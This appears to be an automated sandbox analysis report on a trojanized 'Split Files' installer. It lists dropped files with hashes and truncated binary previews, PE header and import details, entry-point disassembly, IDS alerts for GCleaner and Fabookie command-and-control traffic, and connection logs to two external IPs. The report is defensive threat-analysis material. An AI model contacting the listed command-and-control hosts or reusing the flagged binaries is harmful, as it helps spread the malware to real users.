                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:InnoSetup Log Split Files {215D64A9-0240-4952-9F4D-4D0A65391F2C}, version 0x2a, 4440 bytes, 675052\user, "C:\Program Files (x86)\Split Files"
                Category:dropped
                Size (bytes):4440
                Entropy (8bit):4.696747257913879
                Encrypted:false
                SSDEEP:48:kYTDpyMlLBv8rD85pPmUIrBdcoINLFhqkLVO3471hD5WpPLDfDxLDvvDHD1DoDvO:kGZp8rD85pPmaoINFhqYOIhHeSk9Wi
                MD5:92C5A142DFAAB141F3EF09BCE0B367ED
                SHA1:739EE47E9505A9A816858EB336A6BD224331BB8A
                SHA-256:F3703AB0D05D332938701CA07FF8980B80FACEDA3ACE1738512334F2F2D25272
                SHA-512:19AF8D235779FB7784A64D9AD64FE83CDECE3DA47E7C1BA1540FBB3BF29986662A3B7732660A3D7908208D3B9E659874C78D9F5981EB41705437FC7A8662AADE
                Malicious:false
                Preview:Inno Setup Uninstall Log (b)....................................{215D64A9-0240-4952-9F4D-4D0A65391F2C}}.........................................................................................Split Files.....................................................................................................................*.......X...%.................................................................................................................Da....s......~......B....675052.user"C:\Program Files (x86)\Split Files...........8...}.. ..........R.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMetr
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:data
                Category:dropped
                Size (bytes):94224
                Entropy (8bit):7.998072640845361
                Encrypted:true
                SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                MD5:418619EA97671304AF80EC60F5A50B62
                SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                Malicious:false
                Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):17
                Entropy (8bit):3.1751231351134614
                Encrypted:false
                SSDEEP:3:nCmxEl:Cmc
                MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                Malicious:false
                Preview:UwUoooIIrwgh24uuU
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Users\user\Desktop\file.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):778752
                Entropy (8bit):6.357908612813808
                Encrypted:false
                SSDEEP:12288:cpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOG:2mt2bfrP437QzH/A6A7E7dVPUxOG
                MD5:E8176050192FBB976D70238E3C121F4C
                SHA1:2F1FD24EFE1F3F3FEE775CC3F5255B32F8880900
                SHA-256:AB4FE42A7B708DDB648BB2088216FF47B877AE599FD52FF50359FC1DB8E11EF7
                SHA-512:27EDF7A71C6546F1AB52E7EF97E404975DDD237D6C2D1038D24A49EAB724971884510F00F427C713ADB105857A0B12C7D57CA1CA1C70A6CEFED4BE619C345F4C
                Malicious:true
                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2560
                Entropy (8bit):2.8818118453929262
                Encrypted:false
                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                MD5:A69559718AB506675E907FE49DEB71E9
                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.226829458093667
                Encrypted:false
                SSDEEP:48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
                MD5:9E5BA8A0DB2AE3A955BEE397534D535D
                SHA1:EF08EF5FAC94F42C276E64765759F8BC71BF88CB
                SHA-256:08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
                SHA-512:229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):23312
                Entropy (8bit):4.596242908851566
                Encrypted:false
                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\Split Files\SplitFiles131.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):73728
                Entropy (8bit):6.20389308045717
                Encrypted:false
                SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
                MD5:3FB36CB0B7172E5298D2992D42984D06
                SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
                SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
                SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
                Entropy (8bit):7.9318000564899
                TrID:
                • Win32 Executable (generic) a (10002005/4) 98.88%
                • Inno Setup installer (109748/4) 1.08%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:2094367
                MD5:e0f8085c7cb8eb9cf1c263bb12cfc6df
                SHA1:a109ebcf251a1e69923c60330994190e40ab466c
                SHA256:a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
                SHA512:11f39030a9e5f5a095c85aa087fe949ed7e83e1a53a3df487baab09a38d5e744150a8d4e7b34eaec28678561861e640cb34231b893a7f38751f143d0ea1305d1
                SSDEEP:49152:XirWlOmsJ8sSNd3HEKBqd0yLaS1vNf+8UkqBx:XiClONJu3HEKBqd0yLaGFfvqH
                TLSH:9FA51232715472EEFCE369B0584F426D66236FB3A1A87E2E310A37365A61331F115F1A
                File Content Preview:MZP.....................@.......................Inno....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                Icon Hash:b8ba6cc880e1f204
                Entrypoint:0x409820
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:1
                OS Version Minor:0
                File Version Major:1
                File Version Minor:0
                Subsystem Version Major:1
                Subsystem Version Minor:0
                Import Hash:e92b45c54aa05ec107d5ef90662e6b33
                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFD4h
                push ebx
                push esi
                push edi
                xor eax, eax
                mov dword ptr [ebp-10h], eax
                mov dword ptr [ebp-1Ch], eax
                call 00007F84649FAB4Bh
                call 00007F84649FBDF6h
                call 00007F84649FDFF9h
                call 00007F84649FE040h
                call 00007F8464A00637h
                call 00007F8464A0079Eh
                mov esi, 0040BDE0h
                xor eax, eax
                push ebp
                push 00409F05h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                xor edx, edx
                push ebp
                push 00409EBBh
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                mov eax, dword ptr [0040B014h]
                call 00007F8464A0118Fh
                call 00007F8464A00D4Eh
                lea edx, dword ptr [ebp-10h]
                xor eax, eax
                call 00007F84649FE4B4h
                mov edx, dword ptr [ebp-10h]
                mov eax, 0040BDD4h
                call 00007F84649FABF7h
                push 00000002h
                push 00000000h
                push 00000001h
                mov ecx, dword ptr [0040BDD4h]
                mov dl, 01h
                mov eax, 00407158h
                call 00007F84649FEB9Bh
                mov dword ptr [0040BDD8h], eax
                xor edx, edx
                push ebp
                push 00409E99h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                lea edx, dword ptr [ebp-18h]
                mov eax, dword ptr [0040BDD8h]
                call 00007F84649FEC97h
                mov ebx, dword ptr [ebp-18h]
                mov edx, 00000030h
                mov eax, dword ptr [0040BDD8h]
                call 00007F84649FEDD1h
                mov edx, esi
                mov ecx, 0000000Ch
                Name                                  Virtual Address  Virtual Size  Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                IMAGE_DIRECTORY_ENTRY_IMPORT          0xc000           0x8f0         .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x10000          0x1f558       .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf000           0x0           .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                IMAGE_DIRECTORY_ENTRY_TLS             0xe000           0x18          .rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                CODE    0x1000           0x8f94        0x9000    False     0.6195203993055556   data       6.591638965772245   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA    0xa000           0x248         0x400     False     0.306640625          data       2.7093261929320986  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS     0xb000           0xe64         0x0       False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata  0xc000           0x8f0         0xa00     False     0.3953125            data       4.294209855544776   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls    0xd000           0x8           0x0       False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata  0xe000           0x18          0x200     False     0.052734375          data       0.1991075177871819  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc  0xf000           0x884         0x0       False     0                    empty      0.0                 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc   0x10000          0x1f558       0x1f600   False     0.37483659113545814  data       4.9335056025106585  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                Name           RVA      Size     Type                                                              Language  Country
                RT_ICON        0x1039c  0x51f3   PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced       English   United States
                RT_ICON        0x15590  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 0   English   United States
                RT_ICON        0x25db8  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 0    English   United States
                RT_ICON        0x29fe0  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 0     English   United States
                RT_ICON        0x2c588  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 0     English   United States
                RT_ICON        0x2d630  0x988    Device independent bitmap graphic, 24 x 48 x 32, image size 0     English   United States
                RT_ICON        0x2dfb8  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 0     English   United States
                RT_STRING      0x2e420  0x2f2    data
                RT_STRING      0x2e714  0x30c    data
                RT_STRING      0x2ea20  0x2ce    data
                RT_STRING      0x2ecf0  0x68     data
                RT_STRING      0x2ed58  0xb4     data
                RT_STRING      0x2ee0c  0xae     data
                RT_GROUP_ICON  0x2eebc  0x68     data                                                              English   United States
                RT_VERSION     0x2ef24  0x3a8    data                                                              English   United States
                RT_MANIFEST    0x2f2cc  0x289    XML 1.0 document, ASCII text, with CRLF line terminators          English   United States
                DLL           Import
                kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                user32.dll    MessageBoxA
                oleaut32.dll  VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                kernel32.dll  WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                user32.dll    TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                comctl32.dll  InitCommonControls
                advapi32.dll  AdjustTokenPrivileges
                Language of compilation system  Country where language is spoken  Map
                English                         United States
                Timestamp                 Protocol  SID      Message                                               Source Port  Dest Port  Source IP        Dest IP
                01/05/23-08:47:10.017687  TCP       2852925  ETPRO TROJAN GCleaner Downloader - Payload Response   80           49706      107.182.129.235  192.168.2.5
                01/05/23-08:47:09.800462  TCP       2041920  ET TROJAN GCleaner Downloader Activity M8             49705        80         192.168.2.5      45.139.105.171
                01/05/23-08:47:09.990287  TCP       2852981  ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET)   49706        80         192.168.2.5      107.182.129.235
                01/05/23-08:47:09.925610  TCP       2852980  ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET)   49706        80         192.168.2.5      107.182.129.235
                Timestamp                           Source Port  Dest Port  Source IP        Dest IP
                Jan 5, 2023 08:56:07.737768888 CET  49684        80         192.168.2.3      45.139.105.171
                Jan 5, 2023 08:56:07.761897087 CET  80           49684      45.139.105.171   192.168.2.3
                Jan 5, 2023 08:56:07.762012959 CET  49684        80         192.168.2.3      45.139.105.171
                Jan 5, 2023 08:56:07.762680054 CET  49684        80         192.168.2.3      45.139.105.171
                Jan 5, 2023 08:56:07.786715031 CET  80           49684      45.139.105.171   192.168.2.3
                Jan 5, 2023 08:56:07.796034098 CET  80           49684      45.139.105.171   192.168.2.3
                Jan 5, 2023 08:56:07.796129942 CET  49684        80         192.168.2.3      45.139.105.171
                Jan 5, 2023 08:56:07.851315975 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.878505945 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.878683090 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.879445076 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.906332016 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.906673908 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.906842947 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.962685108 CET  49685        80         192.168.2.3      107.182.129.235
                Jan 5, 2023 08:56:07.989851952 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990107059 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990165949 CET  80           49685      107.182.129.235  192.168.2.3
                Jan 5, 2023 08:56:07.990190983 CET  49685        80         192.168.2.3      107.182.129.235
